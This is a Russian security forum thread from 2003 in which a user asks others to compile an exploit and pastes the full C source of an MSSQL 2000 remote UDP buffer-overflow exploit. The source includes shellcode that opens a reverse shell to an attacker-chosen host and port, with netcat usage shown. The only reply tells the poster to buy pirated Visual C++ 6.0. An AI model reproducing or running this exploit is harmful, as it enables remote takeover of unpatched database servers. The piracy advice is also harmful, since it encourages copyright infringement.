информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Массовый взлом SharePoint   Microsoft Authenticator прекращает...   Очередное исследование 19 миллиардов...
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / hacking		Имя Пароль

	если вы видите этот текст, отключите в настройках форума использование JavaScript

ФОРУМ
	все доски
	FAQ
	IRC
	новые сообщения
	site updates
	guestbook
	beginners
	sysadmin
	programming
	operating systems
	theory
	web building
	software
	hardware
	networking
	law
	hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация

Легенда:   новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение

• Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
• Новичкам также крайне полезно ознакомиться с данным документом.

Пожалуйста скомпилируйте exploit 01.02.03 18:03   Автор: toptop Статус: Незарегистрированный пользователь <"чистая" ссылка>

Эксплоит / Эксплоиты / MSSQL2000 Remote UDP Exploit / /* MSSQL2000 Remote UDP Exploit! Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com fix a bug. Modified by lion, lion@cnhonker.net Welcome to HUC Website http://www.cnhonker.com */ #include <stdio.h> #include <winsock2.h> #pragma comment (lib,"Ws2_32") int GainControlOfSQL(void); int StartWinsock(void); struct sockaddr_in c_sa; struct sockaddr_in s_sa; struct hostent *he; SOCKET sock; unsigned long addr; int SQLUDPPort=1434; char host[256]=""; char request[4000]="\x04"; int explen=361; int len; char exploit_code[362]= "\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C" "\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8" "\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6" "\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90" "\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83" "\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF" "\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF" "\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B" "\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33" "\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50" "\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53" "\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0" "\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9" "\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45" "\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40" "\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35" "\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02" "\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10" "\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45" "\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF" "\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45" "\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98" "\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58" "\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83" "\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D" "\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0" "\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64" "\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74" "\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10" "\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76" "\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D" "\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58" "\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C" "\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C" "\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37" "\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C" "\x58"; int main(int argc, char *argv[]) { unsigned int ErrorLevel=0; int count = 0; char sc[300]=""; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt=""; if(argc != 2 && argc != 5) { printf("===============================================================\r\n"); printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n"); printf("Modified from \"Advanced Windows Shellcode\"\r\n"); printf("Code by David Litchfield, david@ngssoftware.com\r\n"); printf("Modified by lion, fix a bug.\r\n"); printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n"); printf("Usage:\r\n"); printf(" %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]); printf("Exemple:\r\n"); printf(" C:\\>nc -l -p 53\r\n"); printf("Target is MSSQL SP 0:\r\n"); printf(" C:\\>%s 192.168.0.1 192.168.7.1 53 0\r\n",argv[0]); printf("Target is MSSQL SP 1 or 2:\r\n"); printf(" c:\\>%s 192.168.0.1 192.168.7.1 53 1\r\n\n", argv[0]); return 0; } strncpy(host, argv[1], 100); strncpy(ipaddress, argv[2], 36); port = atoi(argv[3]); // SQL Server 2000 Service pack level // The import entry for GetProcAddress in sqlsort.dll // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C // Need to set the last byte accordingly if(argv[4][0] == 0x30) { printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n"); exploit_code[9]=0x10; } else { printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n"); } ErrorLevel = StartWinsock(); if(ErrorLevel==0) { printf("Starting Winsock Error.\r\n"); return 0; } strcpy(buffer,exploit_code); // set this IP address to connect back to // this should be your address ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3]; // set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80 prt = htons(port); prt = prt ^ 0xFFFF; prtt = (char *) &prt; buffer[160]=prtt[0]; buffer[161]=prtt[1]; strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX"); // Overwrite the saved return address on the stack // This address contains a jmp esp instruction // and is in sqlsort.dll. strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC // Need to do a near jump strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46"); // Need to set an address which is writable or // sql server will crash before we can exploit // the overrun. Rather than choosing an address // on the stack which could be anywhere we'll // use an address in the .data segment of sqlsort.dll // as we're already using sqlsort for the saved // return address // SQL 2000 no service packs needs the address here strcat(request,"\x01\x70\xAE\x42"); // SQL 2000 Service Pack 2 needs the address here strcat(request,"\x01\x70\xAE\x42"); // just a few nops strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90"); len = strlen(request)+ explen; // tack on exploit code to the end of our request and fire it off memcpy(request+strlen(request), buffer, explen); // printf("Size: %d/%d\r\n", len, strlen(request)); GainControlOfSQL(); return 0; } int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD(2,1); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) { printf("error WSAStartup 1.\r\n"); return 0; } if ( LOBYTE( wsaData.wVersion ) != 2|HIBYTE( wsaData.wVersion ) != 1 ) { printf("error WSAStartup 2.\r\n"); WSACleanup( ); return 0; } if (isalpha(host[0])) { he = gethostbyname(host); if (he == NULL) { printf("Can't get the ip of %s!\r\n", host); WSACleanup( ); exit(-1); } s_sa.sin_addr.s_addr=INADDR_ANY; s_sa.sin_family=AF_INET; memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); } else { s_sa.sin_family=AF_INET; s_sa.sin_addr.s_addr = inet_addr(host); } return 1; } int GainControlOfSQL(void) { char resp[600]=""; int snd=0,rcv=0,count=0, var=0; unsigned int ttlbytes=0; unsigned int to=2000; SOCKET s; s=socket(AF_INET,SOCK_DGRAM,0); if (s==INVALID_SOCKET) { return printf("sock error.\r\n"); } setsockopt(s, SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int)); s_sa.sin_port=htons((unsigned short)SQLUDPPort); if (connect(s,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) { return printf("Connect error\r\n"); } else { snd=send(s, request , len , 0); /* printf("---"); for(int i=0; i<len;i++) { if((i%16)==0) printf("\n"); printf("%02X ",request[i]&0xff); } printf("\n---\n"); */ printf("Packet sent!\r\n"); printf("If you don't have a shell it didn't work.\r\n"); rcv = recv(s,resp,596,0); if(rcv > 1) { while(count < rcv) { if(resp[count]==0x00) resp[count]=0x20; count++; } printf("%s",resp); } } closesocket(s); return 0; }

	Парень, сходи на ближайшую пиратскую точку и купи там себе Visual C++ 6.0. 01.02.03 21:38   Автор: CCRt Статус: Незарегистрированный пользователь <"чистая" ссылка>

1

Copyright © 2001-2025 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach